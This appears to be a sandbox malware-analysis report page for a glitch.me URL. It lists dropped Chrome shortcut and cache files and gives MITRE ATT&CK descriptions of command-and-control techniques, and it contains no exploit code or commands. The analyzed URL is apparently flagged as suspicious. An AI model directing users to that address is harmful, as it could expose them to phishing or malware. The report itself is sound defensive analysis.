Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Networking

System Summary

Boot Survival

Malware Analysis System Evasion

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 65

Chrome Cache Entry: 66

Chrome Cache Entry: 67

Chrome Cache Entry: 68

Chrome Cache Entry: 69

Chrome Cache Entry: 70

Chrome Cache Entry: 71

Chrome Cache Entry: 72

Chrome Cache Entry: 73

Chrome Cache Entry: 74

Chrome Cache Entry: 75

Chrome Cache Entry: 76

Chrome Cache Entry: 77

Chrome Cache Entry: 78

Chrome Cache Entry: 79

Chrome Cache Entry: 80

Chrome Cache Entry: 81

Static File Info

Network Behavior

Network Port Distribution

Windows Analysis Report
http://clumsy-sulky-helium.glitch.me/

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre